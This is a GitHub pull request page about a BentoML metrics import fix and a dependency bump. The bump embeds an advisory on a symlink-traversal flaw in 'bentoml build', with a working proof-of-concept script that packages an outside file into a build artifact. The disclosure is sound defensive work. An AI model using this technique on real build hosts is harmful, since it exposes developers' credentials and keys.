fix: defer prometheus_client import in bentoml.metrics to fix histogram collection in multiprocess mode#5602
Merged
frostming merged 2 commits on Apr 30, 2026
…am collection in multiprocess mode

Fixes bentoml#5056.

## Root cause

`bentoml.metrics` previously executed `sys.modules[__name__] = prometheus_client` at import time, which caused `prometheus_client` to be imported immediately when user service code did `from bentoml.metrics import Histogram`.

BentoML loads the service module in the parent process *before* forking workers. Workers set `PROMETHEUS_MULTIPROC_DIR` in `os.environ` during startup, but by that point `prometheus_client` had already been imported without the env var and had initialised in single-process mode. Any `Histogram` or `Counter` objects created afterwards wrote to the in-process registry, not the file-backed multiprocess one, so `MultiProcessCollector` (used by BentoML's `/metrics` endpoint) saw nothing from them.

When multiple `Histogram` objects were declared, the symptom manifested as "only the last declared histogram is collected" because the collection code happened to pick up one metric through a different path, masking the full scope of the data loss.

## Fix

Replace the eager `sys.modules` shim with a `__getattr__` lazy loader. `prometheus_client` is now imported the first time an attribute (e.g. `Histogram`) is accessed, which happens *after* the worker has already set `PROMETHEUS_MULTIPROC_DIR`. The resolved attribute is then cached in the module globals so subsequent accesses skip `__getattr__` entirely.

## Tests

Two new unit tests in `tests/unit/test_metrics_deferred_import.py`:

- `test_bentoml_metrics_does_not_import_prometheus_client_eagerly`: asserts that importing `bentoml.metrics` does not pull in `prometheus_client`.
- `test_multiple_histograms_all_collected_in_multiprocess_mode`: full regression test confirming all three histograms from the issue report are visible to `MultiProcessCollector` after the worker sets the env var.
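The lazy loader described under "Fix" can be sketched with a module-level `__getattr__` (PEP 562). This is a minimal illustration and not the code from this PR: the helper `make_lazy_proxy` is hypothetical, and the stdlib `fractions` module stands in for `prometheus_client` so the sketch runs without third-party packages.

```python
import importlib
import types


def make_lazy_proxy(proxy_name: str, target_name: str) -> types.ModuleType:
    """Build a module whose attributes are resolved from `target_name` on first access.

    Hypothetical helper for illustration; not part of BentoML.
    """
    proxy = types.ModuleType(proxy_name)

    def __getattr__(attr: str):
        # The real import happens here, on first attribute access,
        # not when the proxy module itself is created or imported.
        target = importlib.import_module(target_name)
        try:
            value = getattr(target, attr)
        except AttributeError:
            raise AttributeError(
                f"module {proxy_name!r} has no attribute {attr!r}"
            ) from None
        # Cache in the module globals so later lookups never reach __getattr__.
        proxy.__dict__[attr] = value
        return value

    # A function named __getattr__ in a module's namespace is used as the
    # fallback for missing attributes (PEP 562, Python 3.7+).
    proxy.__getattr__ = __getattr__
    return proxy


# Stand-in for bentoml.metrics -> prometheus_client.
lazy_fractions = make_lazy_proxy("lazy_fractions", "fractions")
```

Accessing `lazy_fractions.Fraction` triggers the import and stores `Fraction` in the proxy's namespace. Anything that must happen before the import (such as setting an environment variable) only has to happen before that first access.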
For more information, see https://pre-commit.ci
frostming approved these changes Apr 29, 2026
renovate Bot added a commit to yxtay/agentic-recommenders that referenced this pull request May 7, 2026
This PR contains the following updates:

| Package | Type | Update | Change | OpenSSF |
|---|---|---|---|---|
| [bentoml](https://redirect.github.com/bentoml/bentoml) | project.dependencies | patch | `1.4.38` → `1.4.39` | [](https://securityscorecards.dev/viewer/?uri=github.com/bentoml/bentoml) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency Dashboard](../issues/12) for more information.

---

### BentoML has Information Disclosure in `bentoml build` via symlink traversal in the build context

[CVE-2026-40610](https://nvd.nist.gov/vuln/detail/CVE-2026-40610) / [GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv)

<details>
<summary>More information</summary>

#### Details

##### Summary

BentoML's `bentoml build` packaging workflow follows attacker-controlled symlinks inside the build context and copies the referenced file contents into the generated Bento artifact. If a victim builds an untrusted repository or other attacker-supplied build context, the attacker can place a symlink such as `loot.txt -> /tmp/outside-marker.txt` or a link to a more sensitive local file. When `bentoml build` runs, BentoML dereferences the symlink and packages the target file contents into the Bento. The leaked file can then propagate further through export, push, or containerization workflows.

##### Details

The vulnerable code walks files under the build context and copies each matched entry into the Bento source directory:

```python
for root, _, files in os.walk(ctx_path):
    for f in files:
        dir_path = os.path.relpath(root, ctx_path)
        path = os.path.join(dir_path, f).replace(os.sep, "/")
        if specs.includes(path):
            src_file = ctx_path.joinpath(path)
            dst_file = target_fs.joinpath(dest_path)
            shutil.copy(src_file, dst_file)
```

There is no validation that the resolved path of `src_file` remains inside `ctx_path` before `shutil.copy` dereferences the source path.

As a result, a repository-controlled symlink can cross the trust boundary from `attacker-controlled repository content` to `developer/CI host filesystem` during the build process. This is a build-time path traversal / symlink traversal issue in the packaging feature, not a runtime API issue. The resulting Bento may later be exported, pushed to remote storage, or converted into a container image, which amplifies the leakage impact.

##### PoC

The issue was verified in WSL against BentoML 1.4.38. The following script reproduces the vulnerability by using a harmless marker file outside the build directory.

```bash
mkdir -p /tmp/bento-symlink-poc
cd /tmp/bento-symlink-poc

printf 'BENTOML_SYMLINK_POC_123456\n' > /tmp/outside-marker.txt

cat > service.py <<'EOF'
import bentoml

@bentoml.service
class Demo:
    @bentoml.api
    def ping(self, x: str) -> str:
        return x
EOF

cat > bentofile.yaml <<'EOF'
service: "service:Demo"
include:
  - "service.py"
  - "loot.txt"
EOF

ln -s /tmp/outside-marker.txt loot.txt

bentoml build --output tag
bentoml export demo:7pilrpjtlomelwct /tmp/poc.zip

mkdir -p /tmp/poc-unzip
unzip -o /tmp/poc.zip -d /tmp/poc-unzip
find /tmp/poc-unzip -name loot.txt -print
cat /tmp/poc-unzip/**/src/loot.txt 2>/dev/null || \
  find /tmp/poc-unzip -path '*/src/loot.txt' -exec cat {} \;
```

- The script creates `/tmp/outside-marker.txt` outside the build context as a stand-in for a sensitive local file.
- It creates a minimal BentoML service and explicitly includes `loot.txt` in `bentofile.yaml`.
- It creates `loot.txt` as a symlink to the external marker file.

<img width="1531" height="648" alt="image" src="https://github.com/user-attachments/assets/1312dcf0-74b0-4fb6-a05d-b68644470d82" />

- It runs `bentoml build`, exports the generated Bento, unzips it, and reads the packaged `src/loot.txt`.
- Successful exploitation is confirmed when the packaged file contains `BENTOML_SYMLINK_POC_123456`, proving that BentoML copied the external file contents rather than keeping only the symlink.

<img width="1315" height="121" alt="image" src="https://github.com/user-attachments/assets/6ed34f51-9b68-4fa9-8a42-011deb84d54e" />

<img width="1697" height="760" alt="image" src="https://github.com/user-attachments/assets/9b8a8ae5-4f06-46b4-9e4a-dee25cc5d203" />

##### Impact

An attacker who can cause a developer, release engineer, or CI system to run `bentoml build` on an attacker-controlled repository can exfiltrate local files from the build host into the Bento artifact. This can expose secrets such as cloud credentials, SSH keys, API tokens, environment files, or other sensitive local configuration. Because Bento artifacts are commonly exported, uploaded, stored, or containerized after build, the leaked file contents can spread beyond the original build machine.

#### Severity

- CVSS Score: 5.5 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`

#### References

- [https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv)
- [https://github.com/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv)

This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
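The missing validation the advisory describes (checking that the resolved source path stays inside the build context) could look roughly like the sketch below. It is an illustration only and is not the fix shipped in BentoML: the helper names `resolves_inside` and `iter_safe_files` are hypothetical, and a real implementation might instead copy symlinks as links or reject them outright.

```python
import os
from pathlib import Path
from typing import Iterator


def resolves_inside(ctx_path: Path, candidate: Path) -> bool:
    """Return True if `candidate`, after following symlinks, is within `ctx_path`."""
    root = ctx_path.resolve()
    target = candidate.resolve()
    return target == root or root in target.parents


def iter_safe_files(ctx_path: Path) -> Iterator[Path]:
    """Yield files under `ctx_path` whose resolved location stays in the context.

    Hypothetical helper: entries such as `loot.txt -> /tmp/outside-marker.txt`
    are skipped instead of being dereferenced and copied.
    """
    for dirpath, _, files in os.walk(ctx_path):
        for name in files:
            path = Path(dirpath) / name
            if resolves_inside(ctx_path, path):
                yield path
```

With the PoC layout above, `iter_safe_files` would yield `service.py` and `bentofile.yaml` but not `loot.txt`, because the symlink resolves to a path outside the build context.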
</details>

---

### Release Notes

<details>
<summary>bentoml/bentoml (bentoml)</summary>

### [`v1.4.39`](https://redirect.github.com/bentoml/BentoML/releases/tag/v1.4.39)

[Compare Source](https://redirect.github.com/bentoml/bentoml/compare/v1.4.38...v1.4.39)

##### What's Changed

- ci: pre-commit autoupdate \[skip ci] by [@pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot] in [bentoml/BentoML#5593](https://redirect.github.com/bentoml/BentoML/pull/5593)
- fix: prevent following symlinks when copying files in BentoStore by [@frostming](https://redirect.github.com/frostming) in [bentoml/BentoML#5598](https://redirect.github.com/bentoml/BentoML/pull/5598)
- fix: add sharing=locked to BuildKit cache mounts for multi-arch builds by [@lawrence3699](https://redirect.github.com/lawrence3699) in [bentoml/BentoML#5597](https://redirect.github.com/bentoml/BentoML/pull/5597)
- fix: enhance Dockerfile generation by normalizing base image lines and adding tests by [@frostming](https://redirect.github.com/frostming) in [bentoml/BentoML#5603](https://redirect.github.com/bentoml/BentoML/pull/5603)
- fix: defer prometheus\_client import in bentoml.metrics to fix histogram collection in multiprocess mode by [@ramkrishs](https://redirect.github.com/ramkrishs) in [bentoml/BentoML#5602](https://redirect.github.com/bentoml/BentoML/pull/5602)
- ci: pre-commit autoupdate \[skip ci] by [@pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot] in [bentoml/BentoML#5605](https://redirect.github.com/bentoml/BentoML/pull/5605)
- fix: handle string input in FileSchema by encoding to UTF-8 by [@frostming](https://redirect.github.com/frostming) in [bentoml/BentoML#5606](https://redirect.github.com/bentoml/BentoML/pull/5606)

##### New Contributors

- [@lawrence3699](https://redirect.github.com/lawrence3699) made their first contribution in [bentoml/BentoML#5597](https://redirect.github.com/bentoml/BentoML/pull/5597)
- [@ramkrishs](https://redirect.github.com/ramkrishs) made their first contribution in [bentoml/BentoML#5602](https://redirect.github.com/bentoml/BentoML/pull/5602)

**Full Changelog**: <bentoml/BentoML@v1.4.38...v1.4.39>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/yxtay/agentic-recommenders).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJzZWN1cml0eSJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
## What does this PR address?

Fixes #5056: when multiple `Histogram` objects are declared using `bentoml.metrics`, only the last one appears in the `/metrics` endpoint output.

## Root cause

`bentoml.metrics` previously ran `sys.modules[__name__] = prometheus_client` at import time. This meant `prometheus_client` was imported the moment user service code wrote `from bentoml.metrics import Histogram`, which happens at service-module load time in the parent process, before any worker is forked.

Workers set `PROMETHEUS_MULTIPROC_DIR` in `os.environ` during startup. But since `prometheus_client` was already imported without this env var, it had initialised in single-process mode. Any `Histogram` or `Counter` objects created afterwards wrote to the in-process registry, not the file-backed multiprocess one. `MultiProcessCollector`, which BentoML's `/metrics` endpoint uses, reads from those files and therefore saw none of the user-defined metrics.

The "only last histogram collected" symptom was incidental: the collection path happened to surface one metric through a separate mechanism, masking the true scope of data loss.
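The ordering problem described above can be reproduced in miniature with the standard library alone. The sketch below is an analogy and does not use `prometheus_client`: the environment variable `DEMO_MULTIPROC_DIR`, the `MODE` constant, and the `load` helper are all hypothetical stand-ins for a library that picks its mode once, while its module body runs.

```python
import os
import types

# Source of a toy module that, like the library described above, decides its
# mode once at import time by inspecting the environment.
SOURCE = '''
import os
MODE = "multiprocess" if "DEMO_MULTIPROC_DIR" in os.environ else "single"
'''


def load(name: str) -> types.ModuleType:
    """Execute SOURCE as a fresh module, simulating a first import."""
    module = types.ModuleType(name)
    exec(SOURCE, module.__dict__)
    return module


os.environ.pop("DEMO_MULTIPROC_DIR", None)

# "Parent process": the module is imported before the variable exists.
early = load("early")

# "Worker startup": the variable is set, but `early` has already decided.
os.environ["DEMO_MULTIPROC_DIR"] = "/tmp/demo-multiproc"

# A module imported only now sees the variable.
late = load("late")

print(early.MODE, late.MODE)
```

Setting the variable after the first import does not change `early.MODE`, which is why deferring the import until after worker startup changes the outcome.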
## Fix

Replace the eager `sys.modules` shim with a `__getattr__` lazy loader in `src/bentoml/metrics.py`. `prometheus_client` is now imported the first time an attribute is accessed (e.g. `bentoml.metrics.Histogram`), which happens after the worker has already set `PROMETHEUS_MULTIPROC_DIR`. The resolved attribute is cached in the module globals, so subsequent accesses bypass `__getattr__` entirely.

## Tests

Two new unit tests in `tests/unit/test_metrics_deferred_import.py`:

- `test_bentoml_metrics_does_not_import_prometheus_client_eagerly`: asserts that `import bentoml.metrics` does not pull in `prometheus_client`.
- `test_multiple_histograms_all_collected_in_multiprocess_mode`: full regression test that creates three `Histogram` objects after setting `PROMETHEUS_MULTIPROC_DIR`, then verifies all three are visible to `MultiProcessCollector`. This is the exact scenario from the issue report.

## Notes

- `DeprecationWarning` from `bentoml.metrics` is preserved: it fires on first attribute access, which is the first point where user code actually interacts with the module.
- `prometheus_client` symbols are still accessible through `bentoml.metrics`.
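A check in the spirit of the first test listed under "Tests" can be sketched by importing a module in a fresh interpreter and inspecting `sys.modules`. This is not the test from the PR: the helper `imports_eagerly` is hypothetical, and a subprocess is used here only so that modules already loaded in the current process cannot affect the result.

```python
import subprocess
import sys


def imports_eagerly(module: str, dependency: str) -> bool:
    """Return True if importing `module` in a fresh interpreter also loads `dependency`."""
    code = (
        "import importlib, sys\n"
        f"importlib.import_module({module!r})\n"
        f"print({dependency!r} in sys.modules)\n"
    )
    result = subprocess.run(
        [sys.executable, "-c", code],
        capture_output=True,
        text=True,
        check=True,
    )
    # Use the last line in case the imported module prints during import.
    return result.stdout.strip().splitlines()[-1] == "True"
```

Assuming both packages are installed, `imports_eagerly("bentoml.metrics", "prometheus_client")` would be expected to return `False` once the import is deferred.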